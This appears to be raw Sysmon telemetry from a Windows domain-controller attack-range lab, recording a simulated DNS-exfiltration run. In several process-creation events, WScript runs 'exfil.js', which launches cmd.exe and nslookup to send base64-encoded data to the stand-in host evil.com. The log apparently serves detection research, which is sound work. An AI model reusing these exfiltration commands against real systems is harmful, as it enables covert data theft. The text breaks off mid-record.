10341000x8000000000000000200265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.216{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.215{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.215{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.215{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6740-000000005F02}2132C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.214{2E1864BB-17BF-629A-6540-000000005F02}63043384C:\Windows\system32\cmd.exe{2E1864BB-17BF-629A-6740-000000005F02}2132C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.214{2E1864BB-17BF-629A-6740-000000005F02}2132C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BF-629A-6540-000000005F02}6304C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlanfyl.tmp 2>&1 10341000x8000000000000000200259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.180{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-6640-000000005F02}7688C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.180{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-6640-000000005F02}7688C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.180{2E1864BB-17BF-629A-6640-000000005F02}76888136C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-6540-000000005F02}6304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.180{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6640-000000005F02}7688C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.164{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.164{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.164{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.164{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.164{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6540-000000005F02}6304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.164{2E1864BB-17A1-629A-783D-000000005F02}55525860C:\Windows\System32\WScript.exe{2E1864BB-17BF-629A-6540-000000005F02}6304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.175{2E1864BB-17BF-629A-6540-000000005F02}6304C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlanfyl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.164{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljgvj.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.148{2E1864BB-17BF-629A-6340-000000005F02}16483364C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-6440-000000005F02}2632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.133{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.133{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.133{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.133{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.311{00000000-0000-0000-0000-000000000000}7396<unknown process>-udptruefalse127.0.0.1-52674-false127.0.0.1-53domain 10341000x8000000000000000200241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.133{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6440-000000005F02}2632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000200240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.886{00000000-0000-0000-0000-000000000000}1676<unknown process>-udptruefalse127.0.0.1-52669-false127.0.0.1-53domain 10341000x8000000000000000200239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.133{2E1864BB-17BF-629A-6240-000000005F02}55684780C:\Windows\system32\cmd.exe{2E1864BB-17BF-629A-6440-000000005F02}2632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.145{2E1864BB-17BF-629A-6440-000000005F02}2632C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BF-629A-6240-000000005F02}5568C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljgvj.tmp 2>&1 10341000x8000000000000000200237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.117{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-6340-000000005F02}1648C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.117{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-6340-000000005F02}1648C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.114{2E1864BB-17BF-629A-6340-000000005F02}16483364C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-6240-000000005F02}5568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.080{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6340-000000005F02}1648C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.080{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 